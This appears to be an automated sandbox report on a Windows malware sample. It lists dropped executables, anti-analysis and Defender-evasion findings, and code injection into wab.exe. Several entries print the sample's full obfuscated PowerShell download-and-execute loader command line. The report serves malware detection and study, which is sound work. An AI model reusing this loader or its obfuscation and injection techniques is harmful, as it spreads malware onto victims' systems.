Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2004 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep count: 6060 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272 Thread sleep count: 3771 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: wab.exe, 0000000A.00000002.2744457018.00000000080D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2744457018.0000000008078000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.2263492849.000000000700D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv4
Source: powershell.exe, 00000002.00000002.2438023736.000001CB1A00D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2622804290.000001CB342CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0098D8B8 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 5_2_0098D8B8
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7152.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7152, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7236, type: MEMORYSTR
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: D3FC18 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$elektroencefalograms = 1;$unvacuously='sub';$unvacuously+='strin';$unvacuously+='g';function afvarslingerne($corrodentia){$skrivepapiret=$corrodentia.length-$elektroencefalograms;for($parliaments178=5;$parliaments178 -lt $skrivepapiret;$parliaments178+=6){$mellemvejs+=$corrodentia.$unvacuously.invoke( $parliaments178, $elektroencefalograms);}$mellemvejs;}function delhed($jambos){. ($syresaltet254) ($jambos);}$fertilizing=afvarslingerne 'kodifm bundogangszaffecim.gnel kvinlbeboeai ter/cata 5m,del.uddat0.orur wi.d(tilbaw,eganida sondeprid bag,o,aubewthermstildm ekspan aldet mim. pejls1kopi.0mmesl. dia.0 ubb;sl,mb fami.wsprogikurvenv,sos6rema 4entsv; onse tarahx bo.u6kaval4 a,ls; tomk cig.rr appev satd:anthr1udmal2.ipho1mis,a. sed.0sedat),uder prov.gdemile sterckopibkoversou ykk/ f gh2gutta0 samm1fl nc0grund0skovs1nikke0srpr,1rubri hov.dfparahirimelr camoedottofulcerostrudxkreop/n.rco1okap,2klyng1refrn.u,elv0amula ';$deniably=afvarslingerne 's.zinupraisskittee,azumrunder-wittyasadd,gnick ehyposnf,nget c nd ';$generaene=afvarslingerne 'ra,cehmanubtconvatrainwpstddmshenre:garro/kn.ge/kerbew habiwacylawv.rso.colons humberebelnkonsodmungcstranspsten,aboaercchomse r in.creencdi,toob.ctemmili./ intrpadaylrpot.co dip,/ enlsdvandclcopyi/overtuhyn.eqbruti2phasc1endostembry8dokst ';$barks=afvarslingerne ' lini>kalku ';$syresaltet254=afvarslingerne 'skoldineshlen.umexkla p ';$stereomusik='goldede';$tohaandsbetjening = afvarslingerne 'klu perv.dicrejsehmultio pr,e samme% ennoa ennepfr.udpplanedhor eamooratwhinnazyzzy%bge,g\val dbt.ftsrregi,igrkerdrevolguds.uepaschwarcosach orrinstrd rej s opin.spotlhunbrua segmlwarmu sylle&klosr&trinu fng.ehalfscbaterhcentro nfre bunsetkono, ';delhed (afvarslingerne 'an ui$ sjl.gtil.vlc.oirogelo,b linda isaclteleu:retsvmprvkebknyenebededlpulv,fottomasan,ob halsrkasini ,ermkledsaale.bonpredetdaa.y=ottin(regracraggemtragadsni,f dioe/p onec uth kono$indehtafsvaopterihdechiavantaacopian,malgd a stsbaut,bsh,rtebooketrgre,jafdeleraspenaktivimetabnlizarg cal )sagog ');delhed (afvarslingerne 't,ang$isvafgoptimlforlao eetsb.uperamellelintro:gal eu reobns.edemnavleounconn,aabeo,kadepmask ophilalitlliiad erznonnei maninunmo,g quil=afske$s vsngshutte pretn ileeun apr cumaa spagei,ettnkandiekan,i.heptasmisrepve,trl dagtioxalatpho o( road$ saltbzoodeateutorsatsek tabusunhos) nond ');$generaene=$unmonopolizing[0];$lommen= (afvarslingerne ' arti$ pre.g lystl sp,dodime,b spilaglatblcys,o:familgbaksglkate usuantmmisreehomotli,proivandlk henpetapet=to efnwinkeespearwstolt-dyreso stenbgadedjsogneecamemcmounttdek t ribstsmineryun.ros showtbassee virgmfili,. nonpnindp ee,strt impe.slap.wh.ldeetreckbsti,lcly kelnykalinona,erosennbangst');$lommen+=$mbelfabrikant[1];delhed ($lommen);delhed (afvarslingerne ',verc$a,rhug,affllalpinuhannem ind,eskattljustii datakb,rfoecorus.stin.hhage ecassiajointd nitheklunsr unmesskand[ over$ar.ehdskr.de job nab.m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$elektroencefalograms = 1;$unvacuously='sub';$unvacuously+='strin';$unvacuously+='g';function afvarslingerne($corrodentia){$skrivepapiret=$corrodentia.length-$elektroencefalograms;for($parliaments178=5;$parliaments178 -lt $skrivepapiret;$parliaments178+=6){$mellemvejs+=$corrodentia.$unvacuously.invoke( $parliaments178, $elektroencefalograms);}$mellemvejs;}function delhed($jambos){. ($syresaltet254) ($jambos);}$fertilizing=afvarslingerne 'kodifm bundogangszaffecim.gnel kvinlbeboeai ter/cata 5m,del.uddat0.orur wi.d(tilbaw,eganida sondeprid bag,o,aubewthermstildm ekspan aldet mim. pejls1kopi.0mmesl. dia.0 ubb;sl,mb fami.wsprogikurvenv,sos6rema 4entsv; onse tarahx bo.u6kaval4 a,ls; tomk cig.rr appev satd:anthr1udmal2.ipho1mis,a. sed.0sedat),uder prov.gdemile sterckopibkoversou ykk/ f gh2gutta0 samm1fl nc0grund0skovs1nikke0srpr,1rubri hov.dfparahirimelr camoedottofulcerostrudxkreop/n.rco1okap,2klyng1refrn.u,elv0amula ';$deniably=afvarslingerne 's.zinupraisskittee,azumrunder-wittyasadd,gnick ehyposnf,nget c nd ';$generaene=afvarslingerne 'ra,cehmanubtconvatrainwpstddmshenre:garro/kn.ge/kerbew habiwacylawv.rso.colons humberebelnkonsodmungcstranspsten,aboaercchomse r in.creencdi,toob.ctemmili./ intrpadaylrpot.co dip,/ enlsdvandclcopyi/overtuhyn.eqbruti2phasc1endostembry8dokst ';$barks=afvarslingerne ' lini>kalku ';$syresaltet254=afvarslingerne 'skoldineshlen.umexkla p ';$stereomusik='goldede';$tohaandsbetjening = afvarslingerne 'klu perv.dicrejsehmultio pr,e samme% ennoa ennepfr.udpplanedhor eamooratwhinnazyzzy%bge,g\val dbt.ftsrregi,igrkerdrevolguds.uepaschwarcosach orrinstrd rej s opin.spotlhunbrua segmlwarmu sylle&klosr&trinu fng.ehalfscbaterhcentro nfre bunsetkono, ';delhed (afvarslingerne 'an ui$ sjl.gtil.vlc.oirogelo,b linda isaclteleu:retsvmprvkebknyenebededlpulv,fottomasan,ob halsrkasini ,ermkledsaale.bonpredetdaa.y=ottin(regracraggemtragadsni,f dioe/p onec uth kono$indehtafsvaopterihdechiavantaacopian,malgd a stsbaut,bsh,rtebooketrgre,jafdeleraspenaktivimetabnlizarg cal )sagog ');delhed (afvarslingerne 't,ang$isvafgoptimlforlao eetsb.uperamellelintro:gal eu reobns.edemnavleounconn,aabeo,kadepmask ophilalitlliiad erznonnei maninunmo,g quil=afske$s vsngshutte pretn ileeun apr cumaa spagei,ettnkandiekan,i.heptasmisrepve,trl dagtioxalatpho o( road$ saltbzoodeateutorsatsek tabusunhos) nond ');$generaene=$unmonopolizing[0];$lommen= (afvarslingerne ' arti$ pre.g lystl sp,dodime,b spilaglatblcys,o:familgbaksglkate usuantmmisreehomotli,proivandlk henpetapet=to efnwinkeespearwstolt-dyreso stenbgadedjsogneecamemcmounttdek t ribstsmineryun.ros showtbassee virgmfili,. nonpnindp ee,strt impe.slap.wh.ldeetreckbsti,lcly kelnykalinona,erosennbangst');$lommen+=$mbelfabrikant[1];delhed ($lommen);delhed (afvarslingerne ',verc$a,rhug,affllalpinuhannem ind,eskattljustii datakb,rfoecorus.stin.hhage ecassiajointd nitheklunsr unmesskand[ ove
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$elektroencefalograms = 1;$unvacuously='sub';$unvacuously+='strin';$unvacuously+='g';function afvarslingerne($corrodentia){$skrivepapiret=$corrodentia.length-$elektroencefalograms;for($parliaments178=5;$parliaments178 -lt $skrivepapiret;$parliaments178+=6){$mellemvejs+=$corrodentia.$unvacuously.invoke( $parliaments178, $elektroencefalograms);}$mellemvejs;}function delhed($jambos){. ($syresaltet254) ($jambos);}$fertilizing=afvarslingerne 'kodifm bundogangszaffecim.gnel kvinlbeboeai ter/cata 5m,del.uddat0.orur wi.d(tilbaw,eganida sondeprid bag,o,aubewthermstildm ekspan aldet mim. pejls1kopi.0mmesl. dia.0 ubb;sl,mb fami.wsprogikurvenv,sos6rema 4entsv; onse tarahx bo.u6kaval4 a,ls; tomk cig.rr appev satd:anthr1udmal2.ipho1mis,a. sed.0sedat),uder prov.gdemile sterckopibkoversou ykk/ f gh2gutta0 samm1fl nc0grund0skovs1nikke0srpr,1rubri hov.dfparahirimelr camoedottofulcerostrudxkreop/n.rco1okap,2klyng1refrn.u,elv0amula ';$deniably=afvarslingerne 's.zinupraisskittee,azumrunder-wittyasadd,gnick ehyposnf,nget c nd ';$generaene=afvarslingerne 'ra,cehmanubtconvatrainwpstddmshenre:garro/kn.ge/kerbew habiwacylawv.rso.colons humberebelnkonsodmungcstranspsten,aboaercchomse r in.creencdi,toob.ctemmili./ intrpadaylrpot.co dip,/ enlsdvandclcopyi/overtuhyn.eqbruti2phasc1endostembry8dokst ';$barks=afvarslingerne ' lini>kalku ';$syresaltet254=afvarslingerne 'skoldineshlen.umexkla p ';$stereomusik='goldede';$tohaandsbetjening = afvarslingerne 'klu perv.dicrejsehmultio pr,e samme% ennoa ennepfr.udpplanedhor eamooratwhinnazyzzy%bge,g\val dbt.ftsrregi,igrkerdrevolguds.uepaschwarcosach orrinstrd rej s opin.spotlhunbrua segmlwarmu sylle&klosr&trinu fng.ehalfscbaterhcentro nfre bunsetkono, ';delhed (afvarslingerne 'an ui$ 